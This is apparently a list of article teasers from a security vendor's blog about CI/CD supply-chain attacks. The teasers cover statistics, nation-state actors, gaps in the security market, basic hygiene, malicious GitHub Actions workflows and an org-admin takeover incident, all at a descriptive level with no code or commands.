Data and dispatches on CI/CD supply-chain attacks — how big the problem is, who's driving it, and why the gap between identity and the pipeline keeps winning.
+75% malicious packages in a year, 267-day median detection, ~29M secrets leaked — and the nation-states (North Korea, China, Russia, Iran) behind the worst of it. Sourced.
The security market is organized by telemetry domain, not by how attacks move. Why no incumbent owns the seam between identity and the pipeline — and why that gap is structural, not an oversight.
The $0 hygiene that stops most CI/CD supply-chain attacks — and the residual risk (a valid credential turning hostile) that's actually worth paying to detect.
A syntactically valid GitHub Actions workflow can still be an attack. Why pattern-matching misses intent — and what reasoning over the diff plus the committer looks like.
320+ companies in a year. When the "insider threat" holds a real badge and a real commit history, prevention can't help and identity checks pass — so what's left to detect?
The incident that started Sentinel — an org-admin takeover that ran for days — and where the trail led. What state-aligned tradecraft looks like from the receiving end, and why the geopolitical backdrop makes the developer supply chain a front line.